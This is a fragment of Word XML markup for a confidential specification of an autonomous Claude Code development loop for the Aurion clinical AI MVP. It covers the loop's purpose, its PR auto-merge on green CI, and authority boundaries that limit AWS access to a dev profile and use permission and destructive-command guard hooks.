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i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>AURION CLINICAL AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>The Gold Standard in Clinical AI</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Aurion Coding Workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Autonomous Development Loop · Specification v1.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Confidential  ·  May 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Autonomous development workflow for the Aurion MVP, driven by Claude Code. This document specifies how Claude Code plans, implements, reviews, ships, and monitors changes against the Aurion codebase with minimal human intervention, while keeping the safety constraints in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>CLAUDE.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> enforceable and the pilot timeline (CREOQ/CLLC, demo 2026-07-15) on track.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1. Purpose</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Convert a backlog of P0/P1 tasks into merged, working code, autonomously, without sacrificing the clinical safety constraints that govern this MVP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The workflow is designed so that:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>One long-running driver loop turns backlog items into PRs end-to-end.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cron-fired monitors watch CI, Sentry, and AWS dev infra in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Authority boundaries are mechanical (hooks + permissions + MCP scoping), not advisory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Every PR is a working version of the app — backend boots, iPhone and iPad builds pass, acceptance criteria pass — before the human ever sees it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The human (CTO) only intervenes on alerts the bot couldn't auto-resolve.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2. Authority boundaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">These decisions are encoded into the workflow as hard constraints and duplicated into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>memory/autonomous_authority.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> so future sessions inherit them.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="3120"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Boundary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Decision</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Enforcement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>PR merging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Open + auto-merge on green CI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/auto-merge</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> only fires after </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>gh pr checks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> returns all green AND no security checkbox is unticked.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>AWS / infra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Read-only + Terraform apply to dev only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MCP exposes </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>AWS_PROFILE=aurion-dev</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> only; prod profile unset. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>guard-destructive.sh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> blocks </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>terraform apply</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> outside </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>infrastructure/environments/dev/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Operating cadence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Continuous loop with dynamic pacing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ScheduleWakeup</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> self-paces between ticks (20 min idle / 5 min while CI is running).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Notifications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>GitHub PR + Linear comments + Daily digest file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Slack plugin stays installed but the loop does NOT post to Slack. Linear sub-issues track plans; PR bodies track outcomes; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>digests/YYYY-MM-DD.md</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the async catch-up.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Parallelism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Start single-lane; flip to two once one lane ships 2–3 PRs cleanly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Worktrees in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>~/aurion-lanes/{backend,ios}/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>. Vertical slices that span both stay in a single lane.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Allow-list + deny-list + destructive-guard hook</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Three-layer model. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>default</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> permission mode, NOT </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>bypassPermissions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3. Architecture</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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>│  Driver loop (continuous /loop, dynamic pacing)                  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>│  → picks next task → plans with AC → implements → verifies       │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>│  → /simplify → opens PR with security checklist                  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>│  → ScheduleWakeup polls CI → auto-merges on green                │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
